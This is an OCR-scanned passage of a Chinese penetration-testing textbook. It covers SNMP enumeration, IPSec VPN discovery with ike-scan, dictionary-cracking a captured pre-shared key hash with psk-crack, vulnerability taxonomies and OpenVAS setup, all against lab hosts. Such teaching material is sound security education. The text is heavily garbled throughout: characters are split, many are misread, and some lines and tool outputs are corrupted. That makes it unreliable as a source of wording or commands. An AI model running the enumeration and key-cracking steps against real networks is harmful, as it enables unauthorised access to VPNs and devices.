们 是 否 文 持 某 些 特定 SNMP 字 符 串 。 它 与 其 他 SNMP 扫 描 程 序 不 同 ， 可 
以 以 最 快速 度 〈 间 隔 10 毫 秒 ) 发 送 所 有 的 然后 等 待 目 标 响 
应 并 将 之 记录 。 Ames 设备 文 持 SNMP 协 议 ， 这 个 设备 就 会 以 包 合 
SNMP 了 字符 串 的 信息 进行 啊 应 。 

如 需 启 动 onesixtyone 程 序 ， 可 在 终端 中 直接 输入 onesixtyone ° 

默认 安装 的 Metasploitable 2 并 没有 SNMP 服务 端 程序 。 如 果 这 人 台 主 
机 联 入 网 络 ， 您 可 使 用 下 述 命令 安装 SNMP 服 务 端 程序 。 

apt-get install snmpd 

然后 修改 它 的 配置 文件 /etc/default/snmpd ° 

sudo vi /etc/default/snmpd 

找到 含有 SNMPDOPTIONS 的 那 行 ， 删 除 掉 本 机 地 址 127.0.0.1， 然 
后 重启 SNMPD 服 务 。 

sudo /etc/init.d/snmpd restart 

要 注意 的 是 ， 这 人 台 Metaslpoitable 2 的 主机 应 当 与 互联 网 隔绝 开 来 ， 
否则 很 快 将 招致 攻击 。 


而 后 ， 我 们 使 用 onesixtyone 程 序 搜 索 192.168.56.103 这 人 台 主 机 文 持 
的 SNMP 字 符 串 。 此 时 我 们 需要 使 用 下 述 指 令 。 
onesixtyone 192.168.56.103 
上 述 指令 的 扫描 结 采 如 下 。 
Scanning 1 hosts, 2 communities 
192.168.56.103 [public] Linux metasploitable 2.6.24-16-server #1 SMP 
Thu Apr 10 13:58:00 UTC 2008 i686 
192.168.56.103 [private] Linux metasploitable 2.6.24-16-server 71 
SMP 
Thu Apr 10 13:58:00 UTC 2008 i686 
可 见 这 人 台 主 机 文 持 public 和 private 的 SNMP 字 人 符 串 。 
如 果 需 要 进行 更 细致 的 扫描 ， 可 以 局 用 -d 选 项 。 
onesixtyone -d 192.168.56.103 
上 述 指令 的 返回 结 采 如 下 。 
Debug level 1 
Target ip read from command line: 192.168.56.103 


2 communities: public private 

Waiting for 10 milliseconds between packets 

Scanning 1 hosts, 2 communities 

Trying community public 

192.168.56.103 [public] Linux metasploitable 2.6.24-16-server #1 SMP 
Thu Apr 10 13:58:00 UTC 2008 i686 

Trying community private 

192.168.56.103 [private] Linux metasploitable 2.6.24-16-server #1 

SMP 

Thu Apr 10 13:58:00 UTC 2008 i686 


All packets sent, waiting for responses. 


done. 
6.4.2 snmpcheck 
um 使 用 snmpcheck 程 序 搜集 SNMP 设 备 的 有 关 人 信息， 可 使 用 下 述 


Snmpcheck -t 192.168.56.103 
上 述 指 令 获取 的 SNMP 信 息 如 图 6.12 所 示 。 


[*] Try to connect to 192.168.56.103 
[*] Connected to 192.168.56.103 
[*] Starting enumeration at 2013-07-21 21:23:53 


[*] System information 


Hostname : metasploitable 

Description : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i6 
6 

Uptime system : 27 minutes, 53.74 

Uptime SNMP daemon : 8 minutes, 24.99 

Contact : msfdev@metasploit.com 

Location : Metasploit Lab 

Motd $ lí 


[*] Devices information 


Id Type Status Description 
1025 Network Running network interface lo 
1626 Network Running network interface ethO 
3072 Coprocessor Running Guessing that there's a floating point co-processor 


768 Processor Unknown GenuineIntel: Intel(R) Core(TM) i15-2520M CPU @ 2.50GHz 


图 6.12 


6.5 VPN 枚 举 
在 本 节 中 ， 我 们 将 讨论 虚拟 专用 网 络 (VPN) 系统 的 识别 和 扫 
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数 年 之 前 ， 当 SM 要 与 总 部 实现 内 部 通信 时 ， 需 要 在 二 者 
之 间 织 设 专 用 线路 。 这 种 方法 的 主要 缺点 是 成 本 高 匈 。 专 线 的 租用 响 
用 非常 昂贵 。 

PERIE, VPN 技术 解决 了 这 种 问题 。 分 文 机 构 可 以 使 用 公共 网 
络 (Internet) 通过 VPN 连 接 联 入 总 部 。 相 对 于 租用 专线 而 言 ， 公 共 网 


一 


络 Internet 的 联 入 费用 要 低 很 多 。 同 时 ，VPN 能 够 使 分 支 机 构 像 使 用 本 
地 局 域 网 LAN) 一 样 使 用 总 部 的 应 用 。 另 外 ，VPN 采取 了 加 密 技 
术 ， 可 保护 通信 内 容 的 私密 性 。 

根据 其 所 采用 的 技术 方法 ，VPN 至 少 可 以 分 为 以 下 三 种 。 

e 基于 IPSec 技术 的 VPN: 分 文 机 构 联 入 总 部 局 域 网 的 VPN 解决 方 
案 ， 多 数 是 这 类 方案 。 采 用 这 种 方案 后 ， 分 文 机 构 需要 在 网 关上 安装 
IPSec VPN 客 户 端 ， 总 部 网 关上 也 要 安装 IPSec VPNIIRAS 28 ^ EH T BOE 
过 程 十 分 复杂 ， 单 个 用 户 联 入 总 部 网 络 的 方案 通常 不 是 这 种 方案 。 采 
用 这 种 方法 连接 入 单位 局 域 网 的 用 户 ， 通 常 被 叫做 公路 战士 (road 
warrior) 。 

e OpenVPN: XE FPE 218] VPN 解决 方案 。 采 用 
OpenVPN 方案 的 客户 端 电 脑 通过 OpenVPN 客 户 端 连接 到 VPN 的 服务 
锋 。 这 种 方案 设置 人 简单， 而 且 不 要 求 用 户 具 有 管理 员 级 别 的 权限 。 

e 基于 SSL 技术 的 VPN: 这 种 方案 不 要 求 用 户 安装 专用 的 VPN 客 
户 端 。 只 要 客户 端 电脑 装 有 支持 SSL 连 接 技术 的 Web 浏 览 咽 ，VPN 用 户 
s. n] Egi Du vss ze Re Fl VPNTR AS ds. ° 

ike-scan 

ike-scan 是 探测 、 识 别 并 测试 IPSecVPN 系 统 的 安全 工具 。IPSec 是 
特别 第 见 的 Lan-to-Lan 连 接 技 术 ， 同 时 也 是 多 数 VPN 方 案 所 采用 的 远程 
访问 技术 。 

IPSec 采用 了 下 述 三 种 主要 协议 。 

e Authentication Headers (AH) : 提供 了 数据 的 完整 性 。 

e Encapsulating Security Payloads (ESP) : 保障 数据 的 完整 性 和 保 
性 。 

e Internet Key Exchange (IKE) : 通信 终端 之 间 进 行 参 数 协商 的 通 
信 协 议 。 它 用 于 安全 关联 (Security Association) 的 建立 、 维 持 和 终 
JE © 
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IKE 建 立 安全 关联 时 分 为 下 述 几 个 阶段 。 

e IKE phase 1: 在 两 个 IPSec 终端 间 协 商 参数 ， 协 商 加 密 算 法 、 完 
整 性 算法 、 认 证 类 型 、 密 钥 分 发 机 制 、 生 命 周 期 等 ， 以 建立 安全 的 通 
信和 隧道 。IKE phase 1 会 采用 main mode 或 aggressive mode 建 立 双 问 安全 
关联 。main mode 通过 3 对 消息 协商 安全 关联 。 相 比 之 下 ，aggressive 
mode 通 过 3 对 消息 的 交换 ， 却 能 提供 更 快 的 安全 关联 。 

eIKE phase 2: 用 于 数据 保护 。 

e IKE phase 1.5 或 extended authentication phase: 这 个 阶段 是 可 选 阶 
段 ， 通 种 出 现在 远程 访问 的 VPN 方 案 里 。 

ike-scanf£ FF [3] VPNJIR A 28 A X&IKE phase 1 的 数据 包 ， 然 后 分 析 目 
标 主 机 的 响应 数据 。 

ike-scan 程 序 具 备 下 述 几 个 特点 。 

e 能 够 癌 任 意 数量 目标 主机 发 送 IKE 数据 包 

e 能 够 以 灵活 的 方式 组 建 IKE 的 探测 数据 包 

e 能 够 解码 并 显示 所 有 的 服务 器 啊 应 数据 包 。 

e 能 够 配合 psk-crack 工具 破解 预 共享 密 钥 。 

总 而 言 之 ，ike-scan 程 序 具 有 下 述 作用 。 

e 探测 : 通过 显示 啊 应 IKE 请 求 的 主机 ， 搜 索 运行 IKE 的 主机 。 

e 识别 : 识别 IPSec 的 IKE ZMF ° o8 E, HH 
信息 包 售 VPN 服务 器 厂商 和 型 号 。 这 在 接 下 来 漏洞 分 析 过 程 中 是 十 分 
有 用 的 。 

通常 来 说 ， 只 有 ike-scan 这 类 工具 才能 找到 IPSec VPNARS ae ° Al 
为 IPSec 服务 端 程序 并 不 监听 TCP 端口 ， 所 以 端口 扫描 程序 不 能 探测 
IPSec VPN 服 务 絮 。 而 且 这 种 服务 絮 并 不 会 回复 ICMP unreachable 的 错 
误 信 息 ， 所 以 UDP 扫描 程序 也 无 法 搜索 到 IPSec VPN 服 务 器 。 男 外 ， FC 
沦 是 向 UDP 500 端口 发 送 随机 数据 ， 还 是 癌 50 号 或 51 号 IP 协议 发 送 随 
机 数据 ， 这 类 服务 絮 并 不 进行 任何 响应 。 也 就 是 说 ， 如 有 果 要 搜索 IPSec 


VPN 服务 ， 就 只 能 使 用 发 送 合 法 IKE 数 据 包 的 检测 程序 ， 分 析 服 务 器 
FPE HIR]. o 

如 需 在 终端 中 启动 ike-scan 程 序 ， 可 使 用 下 述 指令 。 

ike-scan 

该 命令 将 在 屏幕 上 显示 指令 说 明和 使 用 范例 。 本 例 将 通过 下 述 指 
令 ， 探 测 、 识 别 、 测 试 一 台 IPSec VPN 服 务 絮 。 

ike-scan -M -A -Pike-hashkey 192.168.0.10 

其 中 ， 各 选项 的 作用 分 别 如 下 。 

e -M: 将 payload 的 解码 信息 分 为 多 行 显 示 ， 以 便于 阅读 。 

e-A: 使 用 IKE 的 aggressive mode ° 

e-P: 将 aggressive mode 的 预 共 享 密 钥 的 哈 希 值 保存 为 文件 。 


yp ,一 /一 — 
上 述 指 令 的 运行 结果 如 图 6.13 所 示 。 

root@kali:~# ike-scan -M -A -Pike-hashkey 192.168.0.10 
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 
192.168.0.10 Aggressive Mode Handshake returned 

HDRz(CKY -R=5 fe7eb4afa630434) 

SA=(Enc=3DES Hash=SHA1 Auth=PSK Group=2:modp1024 LifeType=Seconds LifeD 
ration( 4) =0x00007080) 

KeyExchange(128 bytes) 

Nonce(16 bytes) 

ID(Type=ID_IPV4_ADDR, Value=192.168.0.10) 

Hash(20 bytes) 

VID-afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) 


Ending ike-scan 1.9: 1 hosts scanned in 0.034 seconds (29.27 hosts/sec). 1 ret 
rned handshake; O returned notify 


图 6.13 
其 中 ， 在 SA (安全 关联 ) payload 中 有 意义 的 信息 如 下 。 
e Encryption: 3DES ? 
e Hash: SHA1 œ° 
e Auth: PSK ° 
e Diffie-Hellman group: 2 ° 
e SA life time: 28800 seconds ° 
该 指令 将 预 共享 密 钥 的 哈 希 值 被 保存 为 ike-hashkey 文 件 。 


之 后 ， 我 们 使 用 psk-crack 程 序 破 解 VPN 连 接 的 哈 希 值 。 有 关 指 令 
AU e 

psk-crack —d rockyou.txt ike-hashkey 

此 处 ，-d 选 项 用 于 指定 字典 文件 。 

上 述 指令 的 运行 结果 如 图 6.14 所 示 。 


root@kali:~# psk-crack -d rockyou.txt ike-hashkey 

Starting psk-crack [ike-scan 1.9] (http://www.nta-monitor.com/tools/ike-scan/) 
Running in dictionary cracking mode 

key "123456" matches SHA1 hash 74948c512be7950157e6b925 f9c 426e3e12cc151 

Endin sk-crack: 1 iterations in 0.030 seconds (33.34 iterations/sec 


图 6.14 
上 述 信息 表明 ， 密 钥 是 123456。 您 可 以 使 用 这 个 密 钥 连接 到 VPN 


下 一 步 任务 是 识别 VPN 服 务 器 。 这 时 要 不 断 尝试 各 种 转换 
TAE. 参数 ， — 可 接受 的 参数 为 止 。 
有 关 转 换 参 数 的 详细 介绍 ， 请 参见 http:/wwwnta- 


monitor.com/wiki/index.php/Ike- 


scan User Guidez'rying Different Transforms。 


参考 前 文 的 安全 关联 payload 人 信息， 我 们 使 用 下 述 指令 进行 识别 。 
ike-scan -M --trans-5,2,1,2 --showbackoff 192.168.0.10 


上 述 指 令 的 运行 结果 如 图 6.15 所 示 。 


root@kali:~# ike-scan -M --trans-5,2,1,2 --showbackoff 192.168.0.10 
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 
192.168.0.10 Main Mode Handshake returned 

HDR=( CKY -R=8cb7b6369d11ae81) 

SA=(Enc=3DES Hash=SHA1 Auth=PSK Group=2:modp1024 LifeType-Seconds LifeDuration(4)- 
0x00007086) 

VID24f45755c645c6a795c5c6170 

VID-afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) 


IKE Backoff Patterns: 


IP Address No. Recv time Delta Time 
192.168.0.10 1 1386775276.209957 09.000000 

192.168.0.10 2 1386775286 .214992 10.005035 
192.168.0.10 3 1386775306 .236889 20.021897 


192.168.0.10 Implementation guess: Linux FreeS/WAN, OpenSwan, strongSwan 


Ending ike-scan 1.9: 1 hosts scanned in 90.086 seconds (0.01 hosts/sec). 1 returned hands 
hake; O0 returned notif 


图 6.15 
Fy UL, ，ike-scan 程 序 猜 测 远 程 VPN 服 务 器 所 用 的 版 本 可 能 是 
FreeS/WAN、OpenSwan 或 strongSwan。 


6.6 总 结 


本 章 讨论 服务 枚 举 的 方法 和 用 途 。 这 部 分 内 容 还 介绍 了 以 端口 扫 
描 的 方式 进行 服务 枚 举 的 具体 方法 。 您 相继 接触 到 了 不 同类 型 的 端口 
扫描 ， 以 及 几 款 利用 的 扫描 工具 ， 例 如 Nmap、Unicornscan 和 Amap。 
接 下 来 ， 介 绍 了 nbtscan 进 行 SMB 服 务 枚 举 的 方法 ， 和 onesixtyone 和 
snmpcheck 程 序 进行 SNMP 枚 举 的 方法 。 最 后 绍 了 VPN 枚 举 和 相应 的 扫 
摘 工 具 ike-scan ° 

在 下 一 章 中 ， 我 们 将 关注 如 何在 目标 环境 中 识别 并 分 析 安 全 漏 
ili] ° 


漏洞 映射 旨 在 识别 和 分 析 目 标 环境 中 的 决定 性 安全 缺陷 ， 有 时 也 
称 为 脆弱 性 评估 。 它 是 一 种 在 IT 基础 设施 的 安全 控制 中 探寻 已 知 弱点 
的 分 析 方 法 ， 和 是 脆弱 性 管理 计划 的 一 个 关键 组 成 部 分 。 测 试 人 员 在 完 
成 了 信息 收集 、 目 标识 别 和 服务 枚 举 的 相关 工作 后 ， 了 就 可 着 手 分 析 目 
标 设施 中 可 能 存在 的 安全 漏洞 。 安 全 漏洞 可 能 导致 目标 系统 发 生 安全 
事故 ， 有 害 于 业务 系统 的 保密 性 、 完 整 性 和 可 用 性 。 

本 章 将 要 讨论 安全 漏洞 的 两 种 常见 类 型 ， 亲 述 安 全 漏洞 的 各 种 分 
类 标准 ， 还 会 介绍 Kali Linux 系 统 提 供 的 几 款 车 名 的 脆弱 性 分 析 工 具 。 
这 部 分 章节 涵盖 以 下 几 个 主题 。 

e 漏洞 的 两 种 第 见 类 型 .本 地 漏洞 和 远程 漏洞 。 


e 漏洞 分 类 的 行业 标准 和 分 类 的 依据 。 

e 几 蒜 有 助 于 查找 并 分 析 目 标 环境 中 存在 的 安全 缺陷 的 安全 工具 。 
本 章 依 据 这 些 工 具 在 安全 评估 中 的 主要 功能 对 它们 进行 了 分 类 ， 把 它 
们 分 为 OpenVAS TE ` Cisco 分 析 工 具 、 模 糊 分 析 工 具 、SMB 分 析 工 
具 、SNMP 分 析 工 具 和 Web 应 用 程序 分 析 工 具 。 

值得 注意 的 是 ， 在 进行 渗透 测试 (包括 内 部 和 外 部 ) 时 ， 人 工 评 
估 和 目 动 化 脆弱 性 分 析 都 很 等 重要 。 完 全 依赖 目 动 化 测试 工具 获得 的 
评估 结果 ， 可 能 会 有 假 阳 性 ORR) 和 假 阴性 GIRO) 的 情况 。 同 
上 时， 审计 人 员 对 技术 评估 工具 的 熟悉 程度 同样 影响 着 渗透 测试 工作 的 
质量 。 要 保障 渗透 工作 的 长 期 质量 ， 要 在 注重 评估 工具 质量 的 同时 ， 
不 断 提 高 审计 人 员 的 技能 水 平 。 本 质 上 说 ， 上 自动 化 工具 生成 的 脆弱 性 
分 析 结 果 不 可 能 是 最 终 的 评估 结果 ; 自动 化 工具 不 能 识别 逻辑 错误 、 
未 发 现 的 漏洞 、 未 公布 的 软件 缺陷 ， 以 及 影响 安全 的 人 类 因素 。 因 
此 ， 应 当 同 时 结合 自动 化 分 析 和 人 工分 析 的 方法 ， 综 合 评估 安全 漏 
洞 ， 这 将 大 幅度 提升 渗透 测试 工作 的 成 功 概率 。 


7.1 漏洞 的 类 型 


按照 产生 缺陷 的 不 同 阶段 ， 漏 洞 可 划分 为 以 下 三 个 大 类 : 设计 
类 、 实 施 类 和 运营 类 。 

e 设计 类 漏洞 : 在 软件 设计 阶段 ， 因 软件 规格 指标 设计 不 当 而 产生 
的 安全 弱点 。 

e 实施 类 漏洞 : 位 于 系统 代码 中 的 技术 安全 缺陷 。 

e 运 昔 类 漏洞 : 由 于 系统 的 配置 或 部 署 不 当 而 导致 的 安全 漏洞 。 

基于 对 这 三 个 类 别 的 分 机 ， 我 们 总 结 出 了 漏洞 的 两 个 通用 类 型 ， 
即 本 地 漏洞 和 远程 漏洞 。 上 述 三 类 类 漏洞 既 可 以 古本 地 漏洞， 也 可 以 
是 远程 漏洞 。 


在 上 述 三 类 漏洞 之 中 ， 哪 种 漏洞 问题 最 难 解决 ? 
开发 人 员 根 据 安全 性 需求 指定 系统 安全 规格 ， 并 依 此 在 实施 过 程 
中 实现 各 种 安全 指标 。 因 此 ， 解 决 设计 类 漏洞 的 时 间 最 长 。 


攻击 人 员 以 本 地 (物理 ) 访问 方式 ， 通 过 执行 代码 的 手段 才能 触 
发 的 漏洞 称 为 “本 地 漏洞 ”。 攻 击 人 员 能 够 利用 这 种 类 型 的 漏洞 提高 
身 的 访问 权限 ， 不 受 限 制 地 访问 该 计算 机 系统 。 

例如 ，Bob 拥 有 访问 MS Windows Server 2008 (32 位 x86 平台 ) Ak 
务 颖 的 本 地 权限 。 管 理 员 通 过 某 种 安全 策略 限制 了 他 的 访问 权限 ， 禁 
止 他 运行 特定 的 应 用 程序 。 在 极端 条 件 下 ， 他 发 现 恶意 代码 可 让 他 获 
取 该 计算 机 的 系统 级 别 或 内 核 级 别 权限 。 利 用 了 著名 的 安全 漏洞 ( 例 
如 ，CVE-2013-0232、GP Trap Handler nt!KiTrap0D) 之 后 ， 他 提升 了 
自己 的 权限 等 级 ， 并 能 够 进行 管理 级 别 的 操作 ， 可 不 受 限 制 地 执行 应 
用 程序 。 这 个 范例 表明 ， 恶 意 的 安全 对 手 可 通过 本 地 漏洞 轻易 地 提升 
他 们 访问 计算 机 系统 的 权限 。 

有 关 微 软 Windows 权 限 提升 漏洞 CVE-2013-0232 的 详细 资料 ， 请 参 
Dlhttp://www.exploit-db.com/exploits/11199/ ° 


触发 的 系统 漏洞 ， 称 作 远程 漏洞 。 这 种 类 型 的 漏洞 可 使 得 攻击 人 员 越 
过 物理 上 的 和 本 地 上 的 限制 ， 获 取 远 程 主机 的 访问 权限 。 

例如 ，Bob 和 Alice 分 别 联 入 互联 网 。 他 们 的 IP 地 址 不 同 ， 分 属 不 同 
的 国家 。 假 设 Alice 的 电脑 运行 的 操作 系统 是 windows XP， 使 用 了 生物 
学 认证 技术 。 再 假如 Bob 事先 知道 Alice 主 机 的 操作 系统 和 IP 地 址 。Bob 
极力 想 获取 Alice 电 脑 的 远程 控制 权限 。 同 时 ， 他 了 解 到 可 通过 MS08- 


67 漏洞 (Windows Server Service 的 漏洞 ) 远程 攻击 Windows XP = 
机 。 

有 关 MS08-67， 即 微软 Windows Server Service 漏 润 的 详细 信息 ， 请 
参见 http://www.exploit-db.com/exploits/6841/。 

他 使 用 了 有 关 exploit 程 序 获 取 了 Alice 主 机 的 访问 权限 。 

漏洞 (vulnerability) 和 漏洞 利用 程序 (exploit) 的 关系 是 什么 ? 

漏洞 是 系统 上 存在 的 安全 弱点 。 共 计 人 员 可 利用 有 关 漏 洞 或 pug 获 
取 该 主机 的 未 经 授权 的 操作 权限 。 


随 看 近 些 年 来 扩 术 领域 的 持续 发 展 ， 人 们 也 在 不 断 总 结 安全 漏洞 
的 各 种 分 类 方法 ， 期 待 以 最 合理 的 方式 划分 所 有 的 常见 漏洞 。 但 是 ， 
就 向 见 的 影响 系统 安全 的 编程 问题 来 说 ， 还 没有 一 种 分 类 方法 可 以 将 
之 完全 归纳 。 实 际 上 ， 单 一 的 漏洞 可 能 分 别 属于 多 个 类 别 或 类 型 ， 这 
古 现今 分 类 方法 都 解决 不 了 的 问题 。 男 外 ， 每 种 系统 平台 都 需要 与 外 
部 环境 进行 交互 ， 这 又 带 来 分 类 方法 的 关联 性 问题 、 复 杂 性 问题 和 扩 
展 性 问题 。 如 下 列表 格 所 示 ， 本 书 列 举 了 多 种 分 类 标准 ， 布 望 有 助 您 
识别 各 种 安全 故障 。 值 得 一 提 的 是 ， 很 多 调查 软件 安全 性 问题 的 安全 
评 售 工 具 ， 已 经 采取 了 这 些 漏洞 分 类 方法 。 


安全 分 类 标准 有 关 链 接 


HP 软件 安全 标准 http://www.hpenterprisesecurity.com/vulncat/en/vulncat/ind- 
ex.html 
Seven pernicious kingdoms http://www.cigital.com/papers/download/bsill-taxonomy.pdf 


Common Weakness Enumeration http://cwe.mitre.org/data/index.html 


OWASP TOP 10 http://www.owasp.org/index.php/Category:OWASP Top Ten Project 
http://www.klocwork.com/products/documentation/Insight-9.1/ 
Klocwork 
Taxonomy 
GrammaTech http://www.grammatech.com 


WASC 威胁 分 类 法 http://projects.webappsec.org/Threat-Classification 


上 述 各 种 分 类 方法 ， 分 别 以 各 目的 方式 将 安全 漏洞 进行 分 类 ， 以 
帮助 信息 安全 有 关 人 员 和 研发 人 员 识 别 那些 可 能 会 影响 系统 安全 性 的 
特定 错误 。 因 此 ， 这 些 分 类 方法 并 不 具备 学 术 上 的 完备 性 和 精确 性 。 


7.3 OpenVAS 


OpenVAS 是 一 款 封装 了 多 种 安全 工具 和 安全 服务 的 软件 ， 是 一 个 
强大 的 漏洞 管理 平台 。 它 采用 了 客户 并 / 服 务 名 的 框架。 其 客户 问 测 试 
目标 主机 网 络 漏洞 的 一 系列 操作 ， 都 是 通过 服务 器 端 程序 实现 的 。 它 
的 设计 兼备 模块 化 和 稳定 性 的 特点 ， 文 持 并 行 安全 测试 ， 且 兼容 多 种 
操作 系统 (Linux/Win32) 。OpenVAS 的 核心 组 件 和 主要 功能 如 下 。 

e OpenVAS scanner (fdfüz&) : 负责 管理 、 执 行 各 种 网 络 漏洞 测 
iX (NVT, Network Vulnerability Test) 。NVT 的 订阅 服务 提供 每 日 更 
新 。 整 个 平台 可 通过 订阅 服务 更 新 测试 插件 (参见 
http://www.openvas.org/nvt-feeds.html) ° 

e OpenVAS Client (Pn) : 即 传统 形式 的 桌面 客 工具 和 命令 行 
工具 (CLI) 。 它 通过 OTP 协 议 (OpenVAS Transfer Protocol) 控制 扫描 
器 。OTP 相 当 于 OpenVAS scanner 的 前 段 通 信 协 议 。 

e OpenVAS Manager (管理 程序 ) : 漏洞 扫描 平台 的 中 央 控 制服 
务 。 管 理 程序 仅 负 责 集中 存储 配置 文件 和 存储 扫 摘 结果 。 此 外 ， 它 的 
OMP 协议 (OpenVAS Management Protocol) 完全 基于 XML， 可 用 于 
各 种 用 途 。OMP 可 用 于 设置 扫描 计划 、 生 成 测试 报告 、 筛 选 扫描 结果 
和 聚合 活动 。 

e Greenbone Security Assistant (安全 助手 ) : 工作 于 OMP 的 Web 
服务 。 它 用 于 同 用 户 提 供 一 种 基于 OMP 的 Web 客 户 问 ， 方 便 用 户 配 
置 、 管 理 、 控 制 具体 的 扫描 操作 。 它 的 桌面 版 客户 端 程序 叫做 GSA 


Desktop ， 功 能 完全 一 样 。 此 外 ，OpenVAS CLI (命令 行 工 具 ) 还 支持 
在 文本 命令 行 下 运行 OMP 协 议 的 指令 
e OpenVAS administrator: 负责 用 户 管 理 和 订阅 更 新 。 


OpenVAS 使 用 的 工具 

OpenVAS 集 成 的 工具 清单 如 下 。 
安全 工具 简介 
Amap 应 用 层 协议 的 检测 工具 
IKE-scan IPSec VPN 的 扫描 、 识 别 和 测试 工具 

BUR 
安全 工具 简介 
LdapSearch 从 LDAP 目录 种 获取 信息 的 工具 
Nikto Web 服务 器 评估 工具 
Nmap 端口 扫描 程序 
Ovaldi 开放 式 漏洞 与 评估 语言 转换 程序 
pnscan 端口 扫描 程序 
Portbunny 端口 扫描 程序 
Seccubus OpenVAS 常规 扫描 的 自动 化 工具 
SLAD 多 款 本 地 安全 审计 工具 ,包括 John-the-Ripper、Chkrootkit、ClamAV、Snort、Logwatch、 Tripwire. 
Lsof, Tiger, TrapWatch 和 LM-sensors 

SNMPwalk SNMP 数据 采集 程序 
Strobe 端口 扫描 程序 
w3af Web 程序 攻击 与 审计 框架 


设置 OpenVAS 的 关键 步骤 如 下 。 

1. 在 时 面 来 单 中 依 此 选中 Kali Linux | Analysis | 
OpenVAS | Openvas check setup ， 并 按照 程序 的 同 导 进行 操作 ， 以 确定 
本 机 已 经 正确 安装 了 OpenVAS 程 序 。 然 后 按照 提示 ， 用 默认 的 选项 设 
置 证 书 等 项 目 ， 仅 建议 您 在 完全 理解 这 些 工 具 的 情况 下 进行 目 定 义 设 
置 。 在 您 完成 了 每 个 FIX (修复 ) 操作 之 后 ， 您 需要 重新 运行 一 次 
openvas check setup， 直 到 它 提示 您 已 经 成 功 配 置 好 了 这 个 程序 。 如 图 
7.1 所 示 ， 您 同样 可 以 在 命令 行 窗口 里 启动 这 个 程序 。 


2. 在 桌面 菜单 中 依 此 选中 Kali Linux | Vulnerability Analysis | 
OpenVAS | Openvas check setup， 创 建 一 个 OpenVAS 扫描 所 需 的 用 户 账 
号 。 在 程序 询问 Authentication (pass/cert) 时 直接 用 回 车 键 跳 过 该 设 
置 。 在 创建 账号 的 最 后 一 步 ， 程 序 会 要 您 为 新 建 账号 创建 规则 。 如 果 
您 不 需要 设置 特定 规则 ， 可 使 用 Cul+D 键 直接 退出 。 如 果 您 要 进行 相应 
设置 ， 可 通过 下 述 指令 查看 有 关 设 置 的 帮助 文件 。 

# man openvas-adduser 

3. 在 主机 联 入 互联 网 的 情况 下 ， 通 过 NVT 的 订阅 服务 更 新 
OpenVAS 的 插件 ， 即 在 加 面 采 单 中 依次 选中 Kali Linux 
|VulnerabilityAssessment | OpenVAS | OpenVas NVTSync ° 

4. 接 下 来 就 需要 局 动 OpenVAS 的 服务 端 程序 ， 以 使 客户 端 程序 能 
We XT TRE o TEE hp H fX IX 6 H Kali Linux | Vulnerability 
Assessment | OpenVAS | OpenVas Server， 并 等 竺 程序 加 载 完毕 。 


openvas-check-setup 2.2.3 
Test completeness and readiness of OpenVAS-6 
(add '--v4', '--v5' or '--v7' 
if you want to check for another OpenVAS version) 


Please report us any non-detected problems and 
help us to improve this check routine: 
http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss 


Send us the log-file (/tmp/openvas-check-setup.log) to help analyze the proble 


Use the parameter --server to skip checks for client tools 
like GSD and OpenVAS-CLI. 


Step 1: Checking OpenVAS Scanner ... 
OK: OpenVAS Scanner is present in version 3.4.0. 
ERROR: No CA certificate file of OpenVAS Scanner found. 
FIX: Run 'openvas-mkcert'. 


ERROR: Your OpenVAS-6 installation is not yet complete! 


Please follow the instructions marked with FIX above and run this 
script again. 


If you think this result is wrong, please report your observation 

and help us to improve this check routine: 

http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss 

Please attach the log-file (/tmp/openvas-check-setup.log) to help us analyze the 
problem. 


root@kali:-~# 


图 7.1 

5. 最 后 ， 可 启动 OpenVAS 客 户 病 程序 。 在 桌面 菜单 里 ， 桌 面 菜 单 
中 依次 选中 Kali Linux | Vulnerability Assessment | OpenVAS | OpenVas 
Client。 在 客户 端 界面 窗口 出 现 之 后 ， 选 择 File | Connect 连 接 到 
OpenVAS Server， 然 后 输入 在 第 1 步 和 第 2 步 里 设置 的 账号 信息 。 

如 图 7.2 所 示 ， 在 客户 端 程序 中 输入 登录 信息 ， 以 连接 到 OpenVAS 
Server ° 

接 下 来 要 设置 的 参数 是 目标 主机 、 远 择 合适 的 插件 、 提 供 登 录 所 
需 的 凭据 ， 并 指定 必要 的 访问 规则 〈 如 第 2 步 所 述 ) 。 设 置 好 全 局 设置 
之 后 ， 在 菜单 中 选中 File | Scan Assistant， 并 输入 4 个 主要 步骤 (任务 、 
范围 、 目 标 以 及 执行 ) 的 详细 全 息 。 在 测试 目标 系统 之 前 ， 系 统 将 提 
示 指 定 登 录 赁 证， 随后 程序 会 进行 测试 工作 。 您 选择 的 评估 标准 ， 决 


定 了 漏洞 评估 的 时 间 长 度 。 在 完成 评估 的 以 后 ， 程 序 会 显示 本 次 任务 
的 评估 报告 〈( 见 图 7.3) 。 
本 例 中 ， 扫 描 任务 的 名 称 是 CustomerUK。 在 程序 窗口 顶部 的 菜单 
里 ， 选 择 Report | Export 导 出 扫描 报告 ， 此 时 可 以 选择 适合 的 报告 格式 
(如 NBE、XML、HTML、LaTex、TXT 或 PDF) 。OpenVAS 是 一 个 功 
能 强大 的 漏洞 评估 软件 ， 它 不 仅 能 够 在 评估 目标 系统 的 决定 性 安全 问 
题 ， 而 且 还 能 生成 内 容 全 面 的 扫 摘 报告 。 它 的 报告 含有 风险 计量 、 漏 
洞 细 节 、 解 决 方案 和 相关 网 上 资源 等 信息 。 


OpenVAS Server 
Hostname: Port: 


[localhost [9390 B Default | 


Authentication 
Login: 


[sampletest 


Password: 


[eeeeeeeeee —— = 


[ ] Authentication by certificate 


Trusted CA: 


[jusrilocal/var/lib/openvas/CA/cacert.perr Select " 


Conhectifig . 


Connecting to OpenVAS server "localhost" ... 


Receiving dependencies: 9poo 
tome Eo | 
图 7.2 


OpenVAS-Cllent 


File View Task Scope Report Extras Help 


8 i 8 a ti c? Report for scope: Workstation (Task: CustomerUK) 
= Comments | Options Report | 
Host/Port/Severity ported by NVT "Microsoft's SQ | 
Global Settings 
v Q 192.168.0.7 


v CustomerUK 
v Q ms-sql-s (1433/tcp) e remote MS SQL server is vul 


Workstation 
— Security Hole n attacker may use this flaw to 
Report 20100830 


